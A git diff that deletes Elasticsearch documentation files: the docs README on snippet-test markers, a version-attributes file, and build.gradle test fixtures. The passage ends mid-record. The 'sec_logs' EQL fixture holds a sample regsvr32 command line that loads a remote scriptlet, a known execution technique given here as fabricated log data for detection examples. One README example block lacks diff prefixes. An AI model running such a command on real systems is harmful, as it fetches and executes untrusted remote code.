diff --git a/docs/README.asciidoc b/docs/README.asciidoc deleted file mode 100644 index 3b773a066fb..00000000000 --- a/docs/README.asciidoc +++ /dev/null @@ -1,133 +0,0 @@ -The Elasticsearch docs are in AsciiDoc format and can be built using the -Elasticsearch documentation build process. - -See: https://github.com/elastic/docs - -=== Backporting doc fixes - -* Doc changes should generally be made against master and backported through to the current version - (as applicable). - -* Changes can also be backported to the maintenance version of the previous major version. - This is typically reserved for technical corrections, as it can require resolving more complex - merge conflicts, fixing test failures, and figuring out where to apply the change. - -* Avoid backporting to out-of-maintenance versions. - Docs follow the same policy as code and fixes are not ordinarily merged to - versions that are out of maintenance. - -* Do not backport doc changes to https://www.elastic.co/support/eol[EOL versions]. - -=== Snippet testing - -Snippets marked with `[source,console]` are automatically annotated with -"VIEW IN CONSOLE" and "COPY AS CURL" in the documentation and are automatically -tested by the command `./gradlew -pdocs check`. To test just the docs from a -single page, use e.g. `./gradlew -pdocs integTest --tests "\*rollover*"`. - -By default each `[source,console]` snippet runs as its own isolated test. You -can manipulate the test execution in the following ways: - -* `// TEST`: Explicitly marks a snippet as a test. Snippets marked this way -are tests even if they don't have `[source,console]` but usually `// TEST` is -used for its modifiers: - * `// TEST[s/foo/bar/]`: Replace `foo` with `bar` in the generated test. This - should be used sparingly because it makes the snippet "lie". Sometimes, - though, you can use it to make the snippet more clear. Keep in mind that - if there are multiple substitutions then they are applied in the order that - they are defined. - * `// TEST[catch:foo]`: Used to expect errors in the requests. Replace `foo` - with `request` to expect a 400 error, for example. If the snippet contains - multiple requests then only the last request will expect the error. - * `// TEST[continued]`: Continue the test started in the last snippet. Between - tests the nodes are cleaned: indexes are removed, etc. This prevents that - from happening between snippets because the two snippets are a single test. - This is most useful when you have text and snippets that work together to - tell the story of some use case because it merges the snippets (and thus the - use case) into one big test. - * You can't use `// TEST[continued]` immediately after `// TESTSETUP` or - `// TEARDOWN`. - * `// TEST[skip:reason]`: Skip this test. Replace `reason` with the actual - reason to skip the test. Snippets without `// TEST` or `// CONSOLE` aren't - considered tests anyway but this is useful for explicitly documenting the - reason why the test shouldn't be run. - * `// TEST[setup:name]`: Run some setup code before running the snippet. This - is useful for creating and populating indexes used in the snippet. The setup - code is defined in `docs/build.gradle`. See `// TESTSETUP` below for a - similar feature. - * `// TEST[warning:some warning]`: Expect the response to include a `Warning` - header. If the response doesn't include a `Warning` header with the exact - text then the test fails. If the response includes `Warning` headers that - aren't expected then the test fails. 
-* `[source,console-result]`: Matches this snippet against the body of the - response of the last test. If the response is JSON then order is ignored. If - you add `// TEST[continued]` to the snippet after `[source,console-result]` - it will continue in the same test, allowing you to interleave requests with - responses to check. -* `// TESTRESPONSE`: Explicitly marks a snippet as a test response even without - `[source,console-result]`. Similarly to `// TEST` this is mostly used for - its modifiers. - * You can't use `[source,console-result]` immediately after `// TESTSETUP`. - Instead, consider using `// TEST[continued]` or rearrange your snippets. - - NOTE: Previously we only used `// TESTRESPONSE` instead of - `[source,console-result]` so you'll see that a lot in older branches but we - prefer `[source,console-result]` now. - - * `// TESTRESPONSE[s/foo/bar/]`: Substitutions. See `// TEST[s/foo/bar]` for - how it works. These are much more common than `// TEST[s/foo/bar]` because - they are useful for eliding portions of the response that are not pertinent - to the documentation. - * One interesting difference here is that you often want to match against - the response from Elasticsearch. To do that you can reference the "body" of - the response like this: `// TESTRESPONSE[s/"took": 25/"took": $body.took/]`. - Note the `$body` string. This says "I don't expect that 25 number in the - response, just match against what is in the response." Instead of writing - the path into the response after `$body` you can write `$_path` which - "figures out" the path. This is especially useful for making sweeping - assertions like "I made up all the numbers in this example, don't compare - them" which looks like `// TESTRESPONSE[s/\d+/$body.$_path/]`. - * `// TESTRESPONSE[non_json]`: Add substitutions for testing responses in a - format other than JSON. Use this after all other substitutions so it doesn't - make other substitutions difficult. - * `// TESTRESPONSE[skip:reason]`: Skip the assertions specified by this - response. -* `// TESTSETUP`: Marks this snippet as the "setup" for all other snippets in - this file. This is a somewhat natural way of structuring documentation. You - say "this is the data we use to explain this feature" then you add the - snippet that you mark `// TESTSETUP` and then every snippet will turn into - a test that runs the setup snippet first. See the "painless" docs for a file - that puts this to good use. This is fairly similar to `// TEST[setup:name]` - but rather than the setup defined in `docs/build.gradle` the setup is defined - right in the documentation file. In general, we should prefer `// TESTSETUP` - over `// TEST[setup:name]` because it makes it more clear what steps have to - be taken before the examples will work. Tip: `// TESTSETUP` can only be used - on the first snippet of a document. -* `// TEARDOWN`: Ends and cleans up a test series started with `// TESTSETUP` or - `// TEST[setup:name]`. You can use `// TEARDOWN` to set up multiple tests in - the same file. -* `// NOTCONSOLE`: Marks this snippet as neither `// CONSOLE` nor - `// TESTRESPONSE`, excluding it from the list of unconverted snippets. We - should only use this for snippets that *are* JSON but are *not* responses or - requests. 
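To make the markers above concrete, here is a small, made-up AsciiDoc fragment (the query, the response numbers, and the substitution patterns are illustrative only). The request snippet reuses the `messages` setup defined in `docs/build.gradle`; the response snippet is matched against the body of that request's response, with `$body` substitutions covering values that vary from run to run:

```
[source,console]
--------------------------------------------------
GET /my-index-000001/_search
{
  "query": { "match": { "message": "elasticsearch" } }
}
--------------------------------------------------
// TEST[setup:messages]

[source,console-result]
--------------------------------------------------
{
  "took": 5,
  "timed_out": false,
  "_shards": { "total": 1, "successful": 1, "skipped": 0, "failed": 0 },
  "hits": {
    "total": { "value": 1, "relation": "eq" },
    "max_score": 0.9331132,
    "hits": [ ... ]
  }
}
--------------------------------------------------
// TESTRESPONSE[s/"took": 5/"took": $body.took/]
// TESTRESPONSE[s/"max_score": 0.9331132/"max_score": $body.hits.max_score/]
// TESTRESPONSE[s/"hits": \[ \.\.\. \]/"hits": $body.hits.hits/]
```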
- -In addition to the standard CONSOLE syntax these snippets can contain blocks -of yaml surrounded by markers like this: - -``` -startyaml - - compare_analyzers: {index: thai_example, first: thai, second: rebuilt_thai} -endyaml -``` - -This allows slightly more expressive testing of the snippets. Since that syntax -is not supported by `[source,console]` the usual way to incorporate it is with a -`// TEST[s//]` marker like this: - -``` -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: thai_example, first: thai, second: rebuilt_thai}\nendyaml\n/] -``` - -Any place you can use json you can use elements like `$body.path.to.thing` -which is replaced on the fly with the contents of the thing at `path.to.thing` -in the last response. diff --git a/docs/Versions.asciidoc b/docs/Versions.asciidoc deleted file mode 100644 index b1699b99bdd..00000000000 --- a/docs/Versions.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ - -include::{docs-root}/shared/versions/stack/{source_branch}.asciidoc[] - -:lucene_version: 8.7.0 -:lucene_version_path: 8_7_0 -:jdk: 1.8.0_131 -:jdk_major: 8 -:build_flavor: default -:build_type: tar - -:docker-repo: docker.elastic.co/elasticsearch/elasticsearch -:docker-image: {docker-repo}:{version} -:plugin_url: https://artifacts.elastic.co/downloads/elasticsearch-plugins - -/////// -Javadoc roots used to generate links from Painless's API reference -/////// -:java11-javadoc: https://docs.oracle.com/en/java/javase/11/docs/api -:lucene-core-javadoc: https://lucene.apache.org/core/{lucene_version_path}/core - -ifeval::["{release-state}"=="unreleased"] -:elasticsearch-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/elasticsearch/{version}-SNAPSHOT -:transport-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/client/transport/{version}-SNAPSHOT -:rest-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-client/{version}-SNAPSHOT -:rest-client-sniffer-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-client-sniffer/{version}-SNAPSHOT -:rest-high-level-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-high-level-client/{version}-SNAPSHOT -:mapper-extras-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/mapper-extras-client/{version}-SNAPSHOT -:painless-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/painless/lang-painless/{version}-SNAPSHOT -:parent-join-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/parent-join-client/{version}-SNAPSHOT -:percolator-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/percolator-client/{version}-SNAPSHOT -:matrixstats-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/aggs-matrix-stats-client/{version}-SNAPSHOT -:rank-eval-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/rank-eval-client/{version}-SNAPSHOT -:version_qualified: {bare_version}-SNAPSHOT -endif::[] - -ifeval::["{release-state}"!="unreleased"] -:elasticsearch-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/elasticsearch/{version} -:transport-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/client/transport/{version} -:rest-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-client/{version} -:rest-client-sniffer-javadoc: 
https://artifacts.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-client-sniffer/{version} -:rest-high-level-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-high-level-client/{version} -:mapper-extras-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/mapper-extras-client/{version} -:painless-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/painless/lang-painless/{version} -:parent-join-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/plugin/parent-join-client/{version} -:percolator-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/plugin/percolator-client/{version} -:matrixstats-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/plugin/aggs-matrix-stats-client/{version} -:rank-eval-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/plugin/rank-eval-client/{version} -:version_qualified: {bare_version} -endif::[] - -:javadoc-client: {rest-high-level-client-javadoc}/org/elasticsearch/client -:javadoc-xpack: {rest-high-level-client-javadoc}/org/elasticsearch/protocol/xpack -:javadoc-license: {rest-high-level-client-javadoc}/org/elasticsearch/protocol/xpack/license -:javadoc-watcher: {rest-high-level-client-javadoc}/org/elasticsearch/protocol/xpack/watcher - -/////// -Permanently unreleased branches (master, n.X) -/////// -ifeval::["{source_branch}"=="master"] -:permanently-unreleased-branch: -endif::[] -ifeval::["{source_branch}"=="{major-version}"] -:permanently-unreleased-branch: -endif::[] - -/////// -Shared attribute values are pulled from elastic/docs -/////// - -include::{docs-root}/shared/attributes.asciidoc[] - -/////// -APM does not build n.x documentation. Links from .x branches should point to master instead -/////// -ifeval::["{source_branch}"=="7.x"] -:apm-server-ref: {apm-server-ref-m} -:apm-server-ref-v: {apm-server-ref-m} -:apm-overview-ref-v: {apm-overview-ref-m} -endif::[] diff --git a/docs/build.gradle b/docs/build.gradle deleted file mode 100644 index 68078d5f5c5..00000000000 --- a/docs/build.gradle +++ /dev/null @@ -1,1467 +0,0 @@ -import org.elasticsearch.gradle.info.BuildParams - -import static org.elasticsearch.gradle.testclusters.TestDistribution.DEFAULT - -/* - * Licensed to Elasticsearch under one or more contributor - * license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright - * ownership. Elasticsearch licenses this file to you under - * the Apache License, Version 2.0 (the "License"); you may - * not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, - * software distributed under the License is distributed on an - * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY - * KIND, either express or implied. See the License for the - * specific language governing permissions and limitations - * under the License. - */ - -apply plugin: 'elasticsearch.docs-test' -apply plugin: 'elasticsearch.rest-resources' - -/* List of files that have snippets that will not work until platinum tests can occur ... 
*/ -buildRestTests.expectedUnconvertedCandidates = [ - 'reference/ml/anomaly-detection/ml-configuring-transform.asciidoc', - 'reference/ml/anomaly-detection/apis/delete-calendar-event.asciidoc', - 'reference/ml/anomaly-detection/apis/get-bucket.asciidoc', - 'reference/ml/anomaly-detection/apis/get-category.asciidoc', - 'reference/ml/anomaly-detection/apis/get-influencer.asciidoc', - 'reference/ml/anomaly-detection/apis/get-job-stats.asciidoc', - 'reference/ml/anomaly-detection/apis/get-job.asciidoc', - 'reference/ml/anomaly-detection/apis/get-overall-buckets.asciidoc', - 'reference/ml/anomaly-detection/apis/get-record.asciidoc', - 'reference/ml/anomaly-detection/apis/get-snapshot.asciidoc', - 'reference/ml/anomaly-detection/apis/post-data.asciidoc', - 'reference/ml/anomaly-detection/apis/revert-snapshot.asciidoc', - 'reference/ml/anomaly-detection/apis/update-snapshot.asciidoc', - 'reference/ml/anomaly-detection/apis/update-job.asciidoc' -] - -restResources { - restApi { - includeCore '*' - } -} - -testClusters.integTest { - if (singleNode().testDistribution == DEFAULT) { - setting 'xpack.license.self_generated.type', 'trial' - setting 'indices.lifecycle.history_index_enabled', 'false' - if (BuildParams.isSnapshotBuild() == false) { - systemProperty 'es.autoscaling_feature_flag_registered', 'true' - } - setting 'xpack.autoscaling.enabled', 'true' - keystorePassword 's3cr3t' - } - - // enable regexes in painless so our tests don't complain about example snippets that use them - setting 'script.painless.regex.enabled', 'true' - setting 'path.repo', "${buildDir}/cluster/shared/repo" - Closure configFile = { - extraConfigFile it, file("src/test/cluster/config/$it") - } - configFile 'analysis/example_word_list.txt' - configFile 'analysis/hyphenation_patterns.xml' - configFile 'analysis/synonym.txt' - configFile 'analysis/stemmer_override.txt' - configFile 'userdict_ja.txt' - configFile 'userdict_ko.txt' - configFile 'KeywordTokenizer.rbbi' - extraConfigFile 'hunspell/en_US/en_US.aff', project(":server").file('src/test/resources/indices/analyze/conf_dir/hunspell/en_US/en_US.aff') - extraConfigFile 'hunspell/en_US/en_US.dic', project(":server").file('src/test/resources/indices/analyze/conf_dir/hunspell/en_US/en_US.dic') - // Whitelist reindexing from the local node so we can test it. - setting 'reindex.remote.whitelist', '127.0.0.1:*' - - // TODO: remove this once cname is prepended to transport.publish_address by default in 8.0 - systemProperty 'es.transport.cname_in_publish_address', 'true' -} - -// build the cluster with all plugins -project.rootProject.subprojects.findAll { it.parent.path == ':plugins' }.each { subproj -> - /* Skip repositories. We just aren't going to be able to test them so it - * doesn't make sense to waste time installing them. */ - if (subproj.path.startsWith(':plugins:repository-')) { - return - } - // Do not install ingest-attachment in a FIPS 140 JVM as this is not supported - if (subproj.path.startsWith(':plugins:ingest-attachment') && BuildParams.inFipsJvm) { - return - } - testClusters.integTest.plugin subproj.path -} - -buildRestTests.docs = fileTree(projectDir) { - // No snippets in here! - exclude 'build.gradle' - // That is where the snippets go, not where they come from! 
- exclude 'build' - // Just syntax examples - exclude 'README.asciidoc' - // Broken code snippet tests - exclude 'reference/graph/explore.asciidoc' - if (Boolean.parseBoolean(System.getProperty("tests.fips.enabled"))) { - // We don't install/support this plugin in FIPS 140 - exclude 'plugins/ingest-attachment.asciidoc' - // We can't conditionally control output, this would be missing the ingest-attachment plugin - exclude 'reference/cat/plugins.asciidoc' - } -} - -listSnippets.docs = buildRestTests.docs - -Closure setupMyIndex = { String name, int count -> - buildRestTests.setups[name] = ''' - - do: - indices.create: - index: my-index-000001 - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - "@timestamp": - type: date - http: - properties: - request: - properties: - method: - type: keyword - message: - type: text - user: - properties: - id: - type: keyword - doc_values: true - - do: - bulk: - index: my-index-000001 - refresh: true - body: |''' - for (int i = 0; i < count; i++) { - String ip, user_id - if (i == 0) { - ip = '127.0.0.1' - user_id = 'kimchy' - } else { - ip = '10.42.42.42' - user_id= 'elkbee' - } - buildRestTests.setups[name] += """ - { "index":{"_id": "$i"} } - { "@timestamp": "2099-11-15T14:12:12", "http": { "request": { "method": "get" }, "response": { "bytes": 1070000, "status_code": 200 }, "version": "1.1" }, "message": "GET /search HTTP/1.1 200 1070000", "source": { "ip": "$ip" }, "user": { "id": "$user_id" } }""" - } -} -setupMyIndex('my_index', 5) -setupMyIndex('my_index_big', 120) -setupMyIndex('my_index_huge', 1200) - -// Used for several full-text search and agg examples -buildRestTests.setups['messages'] = ''' - - do: - indices.create: - index: my-index-000001 - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - - do: - bulk: - index: my-index-000001 - refresh: true - body: | - {"index":{"_id": "0"}} - {"message": "trying out Elasticsearch"} - {"index":{"_id": "1"}} - {"message": "some message with the number 1"} - {"index":{"_id": "2"}} - {"message": "some message with the number 2"} - {"index":{"_id": "3"}} - {"message": "some message with the number 3"} - {"index":{"_id": "4"}} - {"message": "some message with the number 4"}''' - -// Used for EQL -buildRestTests.setups['sec_logs'] = ''' - - do: - indices.create: - index: my-index-000001 - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - - do: - bulk: - index: my-index-000001 - refresh: true - body: | - {"index":{}} - {"@timestamp": "2099-12-06T11:04:05.000Z", "event": { "category": "process", "id": "edwCRnyD", "sequence": 1 }, "process": { "pid": 2012, "name": "cmd.exe", "executable": "C:\\\\Windows\\\\System32\\\\cmd.exe" }} - {"index":{}} - {"@timestamp": "2099-12-06T11:04:07.000Z", "event": { "category": "file", "id": "dGCHwoeS", "sequence": 2 }, "file": { "accessed": "2099-12-07T11:07:08.000Z", "name": "cmd.exe", "path": "C:\\\\Windows\\\\System32\\\\cmd.exe", "type": "file", "size": 16384 }, "process": { "pid": 2012, "name": "cmd.exe", "executable": "C:\\\\Windows\\\\System32\\\\cmd.exe" }} - {"index":{}} - {"@timestamp": "2099-12-07T11:06:07.000Z", "event": { "category": "process", "id": "cMyt5SZ2", "sequence": 3 }, "process": { "pid": 2012, "name": "cmd.exe", "executable": "C:\\\\Windows\\\\System32\\\\cmd.exe" } } - {"index":{}} - {"@timestamp": "2099-12-07T11:07:09.000Z", "event": { "category": "process", "id": "aR3NWVOs", "sequence": 4 }, "process": { "pid": 2012, "name": "regsvr32.exe", "command_line": "regsvr32.exe /s /u 
/i:https://...RegSvr32.sct scrobj.dll", "executable": "C:\\\\Windows\\\\System32\\\\regsvr32.exe" }} - {"index":{}} - {"@timestamp": "2099-12-07T11:07:10.000Z", "event": { "category": "file", "id": "tZ1NWVOs", "sequence": 5 }, "process": { "pid": 2012, "name": "regsvr32.exe", "executable": "C:\\\\Windows\\\\System32\\\\regsvr32.exe" }, "file": { "path": "C:\\\\Windows\\\\System32\\\\scrobj.dll", "name": "scrobj.dll" }} - {"index":{}} - {"@timestamp": "2099-12-07T11:07:10.000Z", "event": { "category": "process", "id": "GTSmSqgz0U", "sequence": 6, "type": "termination" }, "process": { "pid": 2012, "name": "regsvr32.exe", "executable": "C:\\\\Windows\\\\System32\\\\regsvr32.exe" }}''' - -buildRestTests.setups['host'] = ''' - # Fetch the http host. We use the host of the master because we know there will always be a master. - - do: - cluster.state: {} - - set: { master_node: master } - - do: - nodes.info: - metric: [ http, transport ] - - set: {nodes.$master.http.publish_address: host} - - set: {nodes.$master.transport.publish_address: transport_host} -''' - -buildRestTests.setups['node'] = ''' - # Fetch the node name. We use the host of the master because we know there will always be a master. - - do: - cluster.state: {} - - is_true: master_node - - set: { master_node: node_name } -''' - -// Used by scripted metric docs -buildRestTests.setups['ledger'] = ''' - - do: - indices.create: - index: ledger - body: - settings: - number_of_shards: 2 - number_of_replicas: 1 - mappings: - properties: - type: - type: keyword - amount: - type: double - - do: - bulk: - index: ledger - refresh: true - body: | - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 200, "type": "sale", "description": "something"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 10, "type": "expense", "description": "another thing"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 150, "type": "sale", "description": "blah"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 50, "type": "expense", "description": "cost of blah"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 50, "type": "expense", "description": "advertisement"}''' - -// Used by aggregation docs -buildRestTests.setups['sales'] = ''' - - do: - indices.create: - index: sales - body: - settings: - number_of_shards: 2 - number_of_replicas: 1 - mappings: - properties: - type: - type: keyword - - do: - bulk: - index: sales - refresh: true - body: | - {"index":{}} - {"date": "2015/01/01 00:00:00", "price": 200, "promoted": true, "rating": 1, "type": "hat"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "price": 200, "promoted": true, "rating": 1, "type": "t-shirt"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "price": 150, "promoted": true, "rating": 5, "type": "bag"} - {"index":{}} - {"date": "2015/02/01 00:00:00", "price": 50, "promoted": false, "rating": 1, "type": "hat"} - {"index":{}} - {"date": "2015/02/01 00:00:00", "price": 10, "promoted": true, "rating": 4, "type": "t-shirt"} - {"index":{}} - {"date": "2015/03/01 00:00:00", "price": 200, "promoted": true, "rating": 1, "type": "hat"} - {"index":{}} - {"date": "2015/03/01 00:00:00", "price": 175, "promoted": false, "rating": 2, "type": "t-shirt"}''' - -// Used by cumulative cardinality aggregation docs -buildRestTests.setups['user_hits'] = ''' - - do: - indices.create: - index: user_hits - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - user_id: - type: keyword - timestamp: - type: date - - do: - bulk: - index: 
user_hits - refresh: true - body: | - {"index":{}} - {"timestamp": "2019-01-01T13:00:00", "user_id": "1"} - {"index":{}} - {"timestamp": "2019-01-01T13:00:00", "user_id": "2"} - {"index":{}} - {"timestamp": "2019-01-02T13:00:00", "user_id": "1"} - {"index":{}} - {"timestamp": "2019-01-02T13:00:00", "user_id": "3"} - {"index":{}} - {"timestamp": "2019-01-03T13:00:00", "user_id": "1"} - {"index":{}} - {"timestamp": "2019-01-03T13:00:00", "user_id": "2"} - {"index":{}} - {"timestamp": "2019-01-03T13:00:00", "user_id": "4"}''' - - -// Fake bank account data used by getting-started.asciidoc -buildRestTests.setups['bank'] = ''' - - do: - indices.create: - index: bank - body: - settings: - number_of_shards: 5 - number_of_routing_shards: 5 - - do: - bulk: - index: bank - refresh: true - body: | -#bank_data# -''' -/* Load the actual accounts only if we're going to use them. This complicates - * dependency checking but that is a small price to pay for not building a - * 400kb string every time we start the build. */ -File accountsFile = new File("$projectDir/src/test/resources/accounts.json") -buildRestTests.inputs.file(accountsFile) -buildRestTests.doFirst { - String accounts = accountsFile.getText('UTF-8') - // Indent like a yaml test needs - accounts = accounts.replaceAll('(?m)^', ' ') - buildRestTests.setups['bank'] = - buildRestTests.setups['bank'].replace('#bank_data#', accounts) -} - -// Used by sampler and diversified-sampler aggregation docs -buildRestTests.setups['stackoverflow'] = ''' - - do: - indices.create: - index: stackoverflow - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - author: - type: keyword - tags: - type: keyword - - do: - bulk: - index: stackoverflow - refresh: true - body: |''' - -// Make Kibana strongly connected to elasticsearch and logstash -// Make Kibana rarer (and therefore higher-ranking) than JavaScript -// Make JavaScript strongly connected to jquery and angular -// Make Cabana strongly connected to elasticsearch but only as a result of a single author - -for (int i = 0; i < 150; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "very_relevant_$i", "tags": ["elasticsearch", "kibana"]}""" -} -for (int i = 0; i < 50; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "very_relevant_$i", "tags": ["logstash", "kibana"]}""" -} -for (int i = 0; i < 200; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "partially_relevant_$i", "tags": ["javascript", "jquery"]}""" -} -for (int i = 0; i < 200; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "partially_relevant_$i", "tags": ["javascript", "angular"]}""" -} -for (int i = 0; i < 50; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "noisy author", "tags": ["elasticsearch", "cabana"]}""" -} -buildRestTests.setups['stackoverflow'] += """ -""" -// Used by significant_text aggregation docs -buildRestTests.setups['news'] = ''' - - do: - indices.create: - index: news - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - source: - type: keyword - content: - type: text - - do: - bulk: - index: news - refresh: true - body: |''' - -// Make h5n1 strongly connected to bird flu - -for (int i = 0; i < 100; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "very_relevant_$i", "content": "bird flu h5n1"}""" -} -for (int i = 0; i < 100; i++) { - 
buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "filler_$i", "content": "bird dupFiller "}""" -} -for (int i = 0; i < 100; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "filler_$i", "content": "flu dupFiller "}""" -} -for (int i = 0; i < 20; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "partially_relevant_$i", "content": "elasticsearch dupFiller dupFiller dupFiller dupFiller pozmantier"}""" -} -for (int i = 0; i < 10; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "partially_relevant_$i", "content": "elasticsearch logstash kibana"}""" -} -buildRestTests.setups['news'] += """ -""" - -// Used by some aggregations -buildRestTests.setups['exams'] = ''' - - do: - indices.create: - index: exams - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - grade: - type: byte - - do: - bulk: - index: exams - refresh: true - body: | - {"index":{}} - {"grade": 100, "weight": 2} - {"index":{}} - {"grade": 50, "weight": 3}''' - -buildRestTests.setups['stored_example_script'] = ''' - # Simple script to load a field. Not really a good example, but a simple one. - - do: - put_script: - id: "my_script" - body: { "script": { "lang": "painless", "source": "doc[params.field].value" } } - - match: { acknowledged: true } -''' - -buildRestTests.setups['stored_scripted_metric_script'] = ''' - - do: - put_script: - id: "my_init_script" - body: { "script": { "lang": "painless", "source": "state.transactions = []" } } - - match: { acknowledged: true } - - - do: - put_script: - id: "my_map_script" - body: { "script": { "lang": "painless", "source": "state.transactions.add(doc.type.value == 'sale' ? doc.amount.value : -1 * doc.amount.value)" } } - - match: { acknowledged: true } - - - do: - put_script: - id: "my_combine_script" - body: { "script": { "lang": "painless", "source": "double profit = 0;for (t in state.transactions) { profit += t; } return profit" } } - - match: { acknowledged: true } - - - do: - put_script: - id: "my_reduce_script" - body: { "script": { "lang": "painless", "source": "double profit = 0;for (a in states) { profit += a; } return profit" } } - - match: { acknowledged: true } -''' - -// Used by analyze api -buildRestTests.setups['analyze_sample'] = ''' - - do: - indices.create: - index: analyze_sample - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - analysis: - normalizer: - my_normalizer: - type: custom - filter: [lowercase] - mappings: - properties: - obj1.field1: - type: text''' - -// Used by percentile/percentile-rank aggregations -buildRestTests.setups['latency'] = ''' - - do: - indices.create: - index: latency - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - load_time: - type: long - - do: - bulk: - index: latency - refresh: true - body: |''' - - -for (int i = 0; i < 100; i++) { - def value = i - if (i % 10) { - value = i * 10 - } - buildRestTests.setups['latency'] += """ - {"index":{}} - {"load_time": "$value"}""" -} - -// Used by t_test aggregations -buildRestTests.setups['node_upgrade'] = ''' - - do: - indices.create: - index: node_upgrade - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - group: - type: keyword - startup_time_before: - type: long - startup_time_after: - type: long - - do: - bulk: - index: node_upgrade - refresh: true - body: | - {"index":{}} - {"group": "A", "startup_time_before": 102, "startup_time_after": 89} - {"index":{}} - 
{"group": "A", "startup_time_before": 99, "startup_time_after": 93} - {"index":{}} - {"group": "A", "startup_time_before": 111, "startup_time_after": 72} - {"index":{}} - {"group": "B", "startup_time_before": 97, "startup_time_after": 98} - {"index":{}} - {"group": "B", "startup_time_before": 101, "startup_time_after": 102} - {"index":{}} - {"group": "B", "startup_time_before": 99, "startup_time_after": 98}''' - -// Used by iprange agg -buildRestTests.setups['iprange'] = ''' - - do: - indices.create: - index: ip_addresses - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - ip: - type: ip - - do: - bulk: - index: ip_addresses - refresh: true - body: |''' - - -for (int i = 0; i < 255; i++) { - buildRestTests.setups['iprange'] += """ - {"index":{}} - {"ip": "10.0.0.$i"}""" -} -for (int i = 0; i < 5; i++) { - buildRestTests.setups['iprange'] += """ - {"index":{}} - {"ip": "9.0.0.$i"}""" - buildRestTests.setups['iprange'] += """ - {"index":{}} - {"ip": "11.0.0.$i"}""" - buildRestTests.setups['iprange'] += """ - {"index":{}} - {"ip": "12.0.0.$i"}""" -} -// Used by SQL because it looks SQL-ish -buildRestTests.setups['library'] = ''' - - do: - indices.create: - include_type_name: true - index: library - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - book: - properties: - name: - type: text - fields: - keyword: - type: keyword - author: - type: text - fields: - keyword: - type: keyword - release_date: - type: date - page_count: - type: short - - do: - bulk: - index: library - type: book - refresh: true - body: | - {"index":{"_id": "Leviathan Wakes"}} - {"name": "Leviathan Wakes", "author": "James S.A. Corey", "release_date": "2011-06-02", "page_count": 561} - {"index":{"_id": "Hyperion"}} - {"name": "Hyperion", "author": "Dan Simmons", "release_date": "1989-05-26", "page_count": 482} - {"index":{"_id": "Dune"}} - {"name": "Dune", "author": "Frank Herbert", "release_date": "1965-06-01", "page_count": 604} - {"index":{"_id": "Dune Messiah"}} - {"name": "Dune Messiah", "author": "Frank Herbert", "release_date": "1969-10-15", "page_count": 331} - {"index":{"_id": "Children of Dune"}} - {"name": "Children of Dune", "author": "Frank Herbert", "release_date": "1976-04-21", "page_count": 408} - {"index":{"_id": "God Emperor of Dune"}} - {"name": "God Emperor of Dune", "author": "Frank Herbert", "release_date": "1981-05-28", "page_count": 454} - {"index":{"_id": "Consider Phlebas"}} - {"name": "Consider Phlebas", "author": "Iain M. Banks", "release_date": 